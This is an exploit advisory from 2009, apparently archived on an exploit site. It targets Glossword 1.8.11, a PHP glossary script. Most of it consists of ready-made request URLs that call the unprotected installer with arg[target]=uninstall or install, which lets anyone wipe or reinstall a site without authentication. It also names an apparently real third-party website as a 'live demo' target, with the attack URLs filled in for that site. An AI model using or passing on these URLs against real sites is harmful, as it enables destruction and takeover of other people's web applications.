id: 5460
date: 07/08/2009
title: Glossword <= 1.8.11 Arbitrary Uninstall / Install Vulnerability
author: Evil-Cod3r
cves: 

===============================================================
Glossword <= 1.8.11 Arbitrary Uninstall / Install Vulnerability
===============================================================


==============================================================================
        [»] Glossword Version 1.8.11 (Uninstall/install) Script Vlun
==============================================================================

    [»] Script:             [ Glossword Version 1.8.11 ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://code.google.com/p/glossword/downloads/list ]
    [»] Price:              [ Free ]

###########################################################################

===[ Exploit To Uninstall The Script  ]===   
   
    [»] http://www.Site.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
   
== [ Exploit To New installation The Script ] ==

    [»] http://www.Path.com/path/gw_instal l/index.php?arg[il]=english&arg[target]=install

===[ LIVE DEMO ]===   

        [»] http://www.dataord.com

        [»] Uninstall : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=uninstall
        [»] installation  : http://www.dataord.com/gw_install/index.php?arg[il]=english&arg[target]=install


Author: Evil-Cod3r <-

###########################################################################



#  0day.today [2023-03-22]  #